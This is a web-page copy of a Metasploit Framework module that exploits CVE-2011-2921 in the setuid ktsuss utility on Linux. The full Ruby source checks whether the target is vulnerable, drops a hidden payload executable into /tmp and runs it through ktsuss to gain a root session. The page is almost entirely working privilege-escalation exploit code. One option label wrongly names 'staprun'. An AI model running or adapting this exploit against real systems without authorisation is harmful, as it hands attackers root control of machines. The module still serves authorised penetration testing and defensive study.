Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Linux::Priv

11
  include Msf::Post::Linux::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'ktsuss suid Privilege Escalation',

21
        'Description' => %q{

22
          This module attempts to gain root privileges by exploiting

23
          a vulnerability in ktsuss versions 1.4 and prior.

24


25
          The ktsuss executable is setuid root and does not drop

26
          privileges prior to executing user specified commands,

27
          resulting in command execution with root privileges.

28


29
          This module has been tested successfully on:

30


31
          ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and

32
          ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).

33
        },

34
        'License' => MSF_LICENSE,

35
        'Author' => [

36
          'John Lightsey', # Discovery and exploit

37
          'bcoles'         # Metasploit

38
        ],

39
        'DisclosureDate' => '2011-08-13',

40
        'References' => [

41
          ['CVE', '2011-2921'],

42
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],

43
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],

44
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']

45
        ],

46
        'Platform' => ['linux'],

47
        'Arch' => [

48
          ARCH_X86,

49
          ARCH_X64,

50
          ARCH_ARMLE,

51
          ARCH_AARCH64,

52
          ARCH_PPC,

53
          ARCH_MIPSLE,

54
          ARCH_MIPSBE

55
        ],

56
        'SessionTypes' => ['shell', 'meterpreter'],

57
        'Targets' => [['Auto', {}]],

58
        'DefaultOptions' => {

59
          'AppendExit' => true,

60
          'PrependSetresuid' => true,

61
          'PrependSetresgid' => true,

62
          'PrependSetreuid' => true,

63
          'PrependSetuid' => true,

64
          'PrependFork' => true

65
        },

66
        'Notes' => {

67
          'Reliability' => [ REPEATABLE_SESSION ],

68
          'Stability' => [ CRASH_SAFE ],

69
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

70
        },

71
        'DefaultTarget' => 0

72
      )

73
    )

74
    register_options [

75
      OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])

76
    ]

77
    register_advanced_options [

78
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])

79
    ]

80
  end

81


82
  def ktsuss_path

83
    datastore['KTSUSS_PATH']

84
  end

85


86
  def base_dir

87
    datastore['WritableDir'].to_s

88
  end

89


90
  def upload(path, data)

91
    print_status "Writing '#{path}' (#{data.size} bytes) ..."

92
    rm_f path

93
    write_file path, data

94
    register_file_for_cleanup path

95
  end

96


97
  def upload_and_chmodx(path, data)

98
    upload path, data

99
    chmod path

100
  end

101


102
  def check

103
    return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path

104
    return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path

105


106
    vprint_good "#{ktsuss_path} is setuid"

107


108
    id = cmd_exec 'whoami'

109
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s

110
    vprint_status res

111


112
    unless res.include? 'uid=0'

113
      return CheckCode::Safe

114
    end

115


116
    CheckCode::Vulnerable

117
  end

118


119
  def exploit

120
    if !datastore['ForceExploit'] && is_root?

121
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')

122
    end

123


124
    unless writable? base_dir

125
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

126
    end

127


128
    payload_name = ".#{rand_text_alphanumeric 10..15}"

129
    payload_path = "#{base_dir}/#{payload_name}"

130
    upload_and_chmodx payload_path, generate_payload_exe

131


132
    print_status 'Executing payload ...'

133
    id = cmd_exec 'whoami'

134
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "

135
    vprint_line res

136
  end

137
end

138


139